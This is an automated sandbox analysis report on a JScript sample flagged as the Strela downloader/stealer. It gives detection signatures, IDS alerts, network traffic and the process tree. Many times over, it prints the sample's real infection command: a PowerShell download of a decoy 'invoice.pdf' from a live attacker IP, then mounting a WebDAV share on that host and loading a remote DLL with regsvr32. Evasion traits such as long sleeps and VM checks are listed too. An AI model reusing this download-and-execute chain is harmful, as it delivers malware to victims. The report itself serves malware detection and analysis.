Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2330118683179179335.js

Overview

General Information

Sample name:2330118683179179335.js
Analysis ID:1590541
MD5:084b1b952ac9db0178cef961a98bdda2
SHA1:7d1ef74fe1282cb6c4d9eb954e9791fa68091b43
SHA256:87232fe5592e8fc041f96531fa62db9faa5912ff8157e131a2c66c9c2ed314d1
Tags:jsStrelaStealeruser-cocaman
Infos:

Detection

Strela Downloader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Suricata IDS alerts for network traffic
Yara detected Strela Downloader
Downloads files with wrong headers with respect to MIME Content-Type
Gathers information about network shares
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Windows Scripting host checks user region and language preferences
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: Potential DLL File Download Via PowerShell Invoke-WebRequest
Sigma detected: PowerShell Script Run in AppData
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • wscript.exe (PID: 6520 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2330118683179179335.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 1992 cmdline: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1036 cmdline: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • Acrobat.exe (PID: 5340 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 932 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 500 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2144 --field-trial-handle=1548,i,11892106457076044815,771019309745034490,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • cmd.exe (PID: 5940 cmdline: cmd /c net use \\193.143.1.205@8888\davwwwroot\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • net.exe (PID: 3976 cmdline: net use \\193.143.1.205@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
  • svchost.exe (PID: 6992 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: wscript.exe PID: 6520JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1992, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 1036, ProcessName: powershell.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1992, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 1036, ProcessName: powershell.exe
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2330118683179179335.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2330118683179179335.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2330118683179179335.js", ProcessId: 6520, ProcessName: wscript.exe
    Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 193.143.1.205, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 3976, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49705
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2330118683179179335.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6520, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, ProcessId: 1992, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Hieu Tran: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2330118683179179335.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6520, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, ProcessId: 1992, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2330118683179179335.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6520, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, ProcessId: 1992, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2330118683179179335.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6520, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, ProcessId: 1992, ProcessName: cmd.exe
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1992, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 1036, ProcessName: powershell.exe
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2330118683179179335.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6520, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, ProcessId: 1992, ProcessName: cmd.exe
    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2330118683179179335.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2330118683179179335.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2330118683179179335.js", ProcessId: 6520, ProcessName: wscript.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1992, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 1036, ProcessName: powershell.exe
    Source: Process startedAuthor: frack113: Data: Command: net use \\193.143.1.205@8888\davwwwroot\, CommandLine: net use \\193.143.1.205@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.205@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5940, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.205@8888\davwwwroot\, ProcessId: 3976, ProcessName: net.exe
    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6992, ProcessName: svchost.exe
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use \\193.143.1.205@8888\davwwwroot\, CommandLine: net use \\193.143.1.205@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.205@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5940, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.205@8888\davwwwroot\, ProcessId: 3976, ProcessName: net.exe

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2330118683179179335.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6520, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll, ProcessId: 1992, ProcessName: cmd.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-14T08:56:28.623259+010028595601Malware Command and Control Activity Detected192.168.2.849704193.143.1.20580TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-14T08:56:31.241010+010018100051Potentially Bad Traffic192.168.2.849705193.143.1.2058888TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-14T08:56:28.623259+010018100002Potentially Bad Traffic192.168.2.849704193.143.1.20580TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 2330118683179179335.jsReversingLabs: Detection: 21%

    Software Vulnerabilities

    barindex
    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

    Networking

    barindex
    Source: Network trafficSuricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.8:49705 -> 193.143.1.205:8888
    Source: Network trafficSuricata IDS: 2859560 - Severity 1 - ETPRO MALWARE StrelaStealer CnC Activity - Requesting Decoy Payload (GET) : 192.168.2.8:49704 -> 193.143.1.205:80
    Source: httpBad PDF prefix: HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Tue, 14 Jan 2025 07:56:28 GMT Content-Type: application/pdf Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Data Raw: 31 66 36 61 0d 0a 25 50 44 46 2d 31 2e 37 0a 25 bf f7 a2 fe 0a 31 20 30 20 6f 62 6a 0a 3c 3c 20 2f 50 61 67 65 73 20 33 20 30 20 52 20 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 20 30 20 6f 62 6a 0a 3c 3c 20 2f 54 79 70 65 20 2f 4f 62 6a 53 74 6d 20 2f 4c 65 6e 67 74 68 20 35 36 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4e 20 31 20 2f 46 69 72 73 74 20 34 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 33 56 30 e0 b2 b1 51 d0 77 ce 2f cd 2b 51 30 54 d0 f7 ce 4c 29 56 88 56 30 51 30 50 08 52 88 55 d0 0f a9 2c 48 55 d0 0f 48 4c 4f 2d 56 b0 b3 e3 02 00 25 30 0c 6d 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 20 2f 43 6f 6e 74 65 6e 74 73 20 35 20 30 20 52 20 2f 47 72 6f 75 70 20 3c 3c 20 2f 43 53 20 2f 44 65 76 69 63 65 52 47 42 20 2f 49 20 74 72 75 65 20 2f 53 20 2f 54 72 61 6e 73 70 61 72 65 6e 63 79 20 2f 54 79 70 65 20 2f 47 72 6f 75 70 20 3e 3e 20 2f 4d 65 64 69 61 42 6f 78 20 5b 20 30 20 30 20 35 39 34 2e 39 36 20 38 34 30 2e 39 36 20 5d 20 2f 50 61 72 65 6e 74 20 33 20 30 20 52 20 2f 52 65 73 6f 75 72 63 65 73 20 36 20 30 20 52 20 2f 53 74 72 75 63 74 50 61 72 65 6e 74 73 20 30 20 2f 54 79 70 65 20 2f 50 61 67 65 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 35 20 30 20 6f 62 6a 0a 3c 3c 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4c 65 6e 67 74 68 20 37 35 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 33 54 30 00 42 5d 43 20 61 61 62 a0 67 69 a6 90 9c cb 55 c8 65 a8 00 82 45 e9 0a fa 89 06 0a e9 c5 5c 20 45 a6 96 26 40 79 43 a8 3a a0 6c aa 42 1a 57 a0 42 21 50 39 44 95 82 7e 85 b9 82 4b 3e 57 20 10 02 00 26 99 12 f1 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 36 20 30 20 6f 62 6a 0a 3c 3c 20 2f 45 78 74 47 53 74 61 74 65 20 3c 3c 20 2f 61 30 20 3c 3c 20 2f 43 41 20 31 20 2f 63 61 20 31 20 3e 3e 20 3e 3e 20 2f 58 4f 62 6a 65 63 74 20 3c 3c 20 2f 78 37 20 37 20 30 20 52 20 3e 3e 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 37 20 30 20 6f 62 6a 0a 3c 3c 20 2f 42 42 6f 78 20 5b 20 30 20 30 20 35 39 35 20 38 34 31 20 5d 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 52 65 73 6f 75 72 63 65 73 20 38 20 30 20 52 20 2f 53 75 62 74 79 70 65 20 2f 46 6f 72 6d 20 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 20 2f 4c 65 6e 67 74 68 20 35 39 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 2b e4 0a 54 28 e4 d2 4f 2f 36 50 48 2f e6 2a e4 32 b5 34 d1 b3 34 53 30 00 42 5d 0b 13 03 08 1b ca 48 ce e5 d2 4f 04 a9 53 d0 af 30 34 54 70 c9 e7 0a 04 42 00 f1 ec 0e 9e 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 38 20 30 20 6f 62 6a 0a 3c 3c 20 2f 45 78 74 47 53 74 61 74 65 20 3c 3c 20 2f 61 30 20 3c 3c 20 2f 43 41 20 31 20 2f 63 61 20 31 20 3e 3e 20 2f 67 73 30 20 3c 3c 20 2f 42 4d 20 2f 4e 6f 72 6d 61 6c 20 2f 43 41 20 31 2e 30 20 2f 53 4d 61 73 6b 20 2f 4e 6f 6e 65 20 2f 6
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 8888
    Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49705
    Source: global trafficTCP traffic: 192.168.2.8:49705 -> 193.143.1.205:8888
    Source: global trafficTCP traffic: 192.168.2.8:61859 -> 1.1.1.1:53
